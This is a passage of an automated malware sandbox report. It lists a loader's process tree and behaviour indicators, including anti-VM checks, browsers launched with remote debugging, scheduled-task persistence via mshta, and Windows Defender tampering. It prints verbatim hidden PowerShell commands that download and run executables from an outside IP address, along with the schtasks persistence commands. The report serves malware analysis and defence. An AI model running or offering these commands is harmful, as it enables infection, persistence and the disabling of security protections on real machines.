pid Process 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 3664 lwtLxxH.exe Token: SeDebugPrivilege 2352 powershell.exe Token: SeDebugPrivilege 3392 powershell.exe Token: SeDebugPrivilege 4876 powershell.exe Token: SeDebugPrivilege 3792 TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE Token: SeDebugPrivilege 1520 powershell.exe Token: SeDebugPrivilege 2144 powershell.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeCreatePagefilePrivilege 1868 chrome.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeCreatePagefilePrivilege 1868 chrome.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeCreatePagefilePrivilege 1868 chrome.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeCreatePagefilePrivilege 1868 chrome.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeCreatePagefilePrivilege 1868 chrome.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeCreatePagefilePrivilege 1868 chrome.exe Token: SeShutdownPrivilege 1868 chrome.exe Token: SeCreatePagefilePrivilege 1868 chrome.exe Token: SeDebugPrivilege 5064 e4ba85a4b8.exe -
Suspicious use of FindShellTrayWindow 55 IoCs
pid Process 760 ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe 5020 bf320a244b.exe 5020 bf320a244b.exe 5020 bf320a244b.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 1868 chrome.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe 3376 msedge.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 5020 bf320a244b.exe 5020 bf320a244b.exe 5020 bf320a244b.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 760 wrote to memory of 3532 760 ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe 87 PID 760 wrote to memory of 3532 760 ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe 87 PID 760 wrote to memory of 3532 760 ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe 87 PID 3532 wrote to memory of 3664 3532 skotes.exe 89 PID 3532 wrote to memory of 3664 3532 skotes.exe 89 PID 3532 wrote to memory of 4984 3532 skotes.exe 91 PID 3532 wrote to memory of 4984 3532 skotes.exe 91 PID 3532 wrote to memory of 4984 3532 skotes.exe 91 PID 3532 wrote to memory of 5020 3532 skotes.exe 93 PID 3532 wrote to memory of 5020 3532 skotes.exe 93 PID 3532 wrote to memory of 5020 3532 skotes.exe 93 PID 5020 wrote to memory of 4028 5020 bf320a244b.exe 94 PID 5020 wrote to memory of 4028 5020 bf320a244b.exe 94 PID 5020 wrote to memory of 4028 5020 bf320a244b.exe 94 PID 5020 wrote to memory of 1728 5020 bf320a244b.exe 95 PID 5020 wrote to memory of 1728 5020 bf320a244b.exe 95 PID 5020 wrote to memory of 1728 5020 bf320a244b.exe 95 PID 4028 wrote to memory of 3008 4028 cmd.exe 97 PID 4028 wrote to memory of 3008 4028 cmd.exe 97 PID 4028 wrote to memory of 3008 4028 cmd.exe 97 PID 1728 wrote to memory of 2352 1728 mshta.exe 98 PID 1728 wrote to memory of 2352 1728 mshta.exe 98 PID 1728 wrote to memory of 2352 1728 mshta.exe 98 PID 3532 wrote to memory of 896 3532 skotes.exe 100 PID 3532 wrote to memory of 896 3532 skotes.exe 100 PID 3532 wrote to memory of 896 3532 skotes.exe 100 PID 896 wrote to memory of 3904 896 cmd.exe 102 PID 896 wrote to memory of 3904 896 cmd.exe 102 PID 896 wrote to memory of 3904 896 cmd.exe 102 PID 3904 wrote to memory of 4368 3904 cmd.exe 104 PID 3904 wrote to memory of 4368 3904 cmd.exe 104 PID 3904 wrote to memory of 4368 3904 cmd.exe 104 PID 3904 wrote to memory of 4568 3904 cmd.exe 105 PID 3904 wrote to memory of 4568 3904 cmd.exe 105 PID 3904 wrote to memory of 4568 3904 cmd.exe 105 PID 4568 wrote to memory of 3392 4568 cmd.exe 106 PID 4568 wrote to memory of 3392 4568 cmd.exe 106 PID 4568 wrote to memory of 3392 4568 cmd.exe 106 PID 2352 wrote to memory of 3792 2352 powershell.exe 107 PID 2352 wrote to memory of 3792 2352 powershell.exe 107 PID 2352 wrote to memory of 3792 2352 powershell.exe 107 PID 3904 wrote to memory of 3164 3904 cmd.exe 111 PID 3904 wrote to memory of 3164 3904 cmd.exe 111 PID 3904 wrote to memory of 3164 3904 cmd.exe 111 PID 3164 wrote to memory of 4876 3164 cmd.exe 113 PID 3164 wrote to memory of 4876 3164 cmd.exe 113 PID 3164 wrote to memory of 4876 3164 cmd.exe 113 PID 3532 wrote to memory of 3184 3532 skotes.exe 114 PID 3532 wrote to memory of 3184 3532 skotes.exe 114 PID 3532 wrote to memory of 3184 3532 skotes.exe 114 PID 3904 wrote to memory of 4376 3904 cmd.exe 116 PID 3904 wrote to memory of 4376 3904 cmd.exe 116 PID 3904 wrote to memory of 4376 3904 cmd.exe 116 PID 4376 wrote to memory of 1520 4376 cmd.exe 117 PID 4376 wrote to memory of 1520 4376 cmd.exe 117 PID 4376 wrote to memory of 1520 4376 cmd.exe 117 PID 3904 wrote to memory of 1964 3904 cmd.exe 118 PID 3904 wrote to memory of 1964 3904 cmd.exe 118 PID 3904 wrote to memory of 1964 3904 cmd.exe 118 PID 3904 wrote to memory of 2136 3904 cmd.exe 119 PID 3904 wrote to memory of 2136 3904 cmd.exe 119 PID 3904 wrote to memory of 2136 3904 cmd.exe 119 PID 2136 wrote to memory of 2144 2136 mshta.exe 120 PID 2136 wrote to memory of 2144 2136 mshta.exe 120
Processes
-
C:\Users\Admin\AppData\Local\Temp\ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe"C:\Users\Admin\AppData\Local\Temp\ccb51cf6f3ab9b2c66a0f32105872d244fc2c3800a69b93070d8dd3ef9ec7305.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe"C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3664
-
-
C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe"C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4984 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1396 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1868 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff977d4cc40,0x7ff977d4cc4c,0x7ff977d4cc586⤵PID:848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,8559897863910071743,13477440926699779965,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1884 /prefetch:26⤵PID:2544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,8559897863910071743,13477440926699779965,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2148 /prefetch:36⤵PID:4668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2204,i,8559897863910071743,13477440926699779965,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2220 /prefetch:86⤵PID:2092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,8559897863910071743,13477440926699779965,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:16⤵
- Uses browser remote debugging
PID:2004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,8559897863910071743,13477440926699779965,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:16⤵
- Uses browser remote debugging
PID:3944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4220,i,8559897863910071743,13477440926699779965,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4460 /prefetch:16⤵
- Uses browser remote debugging
PID:1016
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4636,i,8559897863910071743,13477440926699779965,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4688 /prefetch:86⤵PID:1500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,8559897863910071743,13477440926699779965,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:86⤵PID:5028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4908,i,8559897863910071743,13477440926699779965,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4920 /prefetch:86⤵PID:4512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4608,i,8559897863910071743,13477440926699779965,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5060 /prefetch:86⤵PID:3856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5188,i,8559897863910071743,13477440926699779965,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5024 /prefetch:86⤵PID:220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4824,i,8559897863910071743,13477440926699779965,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4888 /prefetch:86⤵PID:5016
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:3376 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff977d546f8,0x7ff977d54708,0x7ff977d547186⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,7321508879420437272,16359706876843367027,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:26⤵PID:224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,7321508879420437272,16359706876843367027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:36⤵PID:2364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,7321508879420437272,16359706876843367027,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:86⤵PID:768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2124,7321508879420437272,16359706876843367027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:16⤵
- Uses browser remote debugging
PID:1684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2124,7321508879420437272,16359706876843367027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:16⤵
- Uses browser remote debugging
PID:1212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2124,7321508879420437272,16359706876843367027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:16⤵
- Uses browser remote debugging
PID:3952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2124,7321508879420437272,16359706876843367027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:16⤵
- Uses browser remote debugging
PID:2632
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\phdj5" & exit5⤵PID:3000
-
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- Delays execution with timeout.exe
PID:2872
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090366101\bf320a244b.exe"C:\Users\Admin\AppData\Local\Temp\1090366101\bf320a244b.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn bDCf3ma67Kr /tr "mshta C:\Users\Admin\AppData\Local\Temp\Y97Zp3SbP.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn bDCf3ma67Kr /tr "mshta C:\Users\Admin\AppData\Local\Temp\Y97Zp3SbP.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3008
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\Y97Zp3SbP.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Users\Admin\AppData\Local\TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE"C:\Users\Admin\AppData\Local\TempLQY8RUQS8YC6RWKJ9CEUYFGFI3YYU6N9.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1090367021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1090367021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "ImFLimazsDI" /tr "mshta \"C:\Temp\9YxEfVXmy.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1964
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\9YxEfVXmy.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2144 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1872
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe"C:\Users\Admin\AppData\Local\Temp\1090370001\ebp51gY.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3184
-
-
C:\Users\Admin\AppData\Local\Temp\1090383001\1f3d74c1b3.exe"C:\Users\Admin\AppData\Local\Temp\1090383001\1f3d74c1b3.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:448
-
-
C:\Users\Admin\AppData\Local\Temp\1090384001\ebp51gY.exe"C:\Users\Admin\AppData\Local\Temp\1090384001\ebp51gY.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2548
-
-
C:\Users\Admin\AppData\Local\Temp\1090385001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1090385001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1828
-
-
C:\Users\Admin\AppData\Local\Temp\1090386001\7nSTXG6.exe"C:\Users\Admin\AppData\Local\Temp\1090386001\7nSTXG6.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3404 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵PID:1288
-
-
-
C:\Users\Admin\AppData\Local\Temp\1090387001\147f6a383d.exe"C:\Users\Admin\AppData\Local\Temp\1090387001\147f6a383d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3056
-
-
C:\Users\Admin\AppData\Local\Temp\1090388001\9b709fec1f.exe"C:\Users\Admin\AppData\Local\Temp\1090388001\9b709fec1f.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4896
-
-
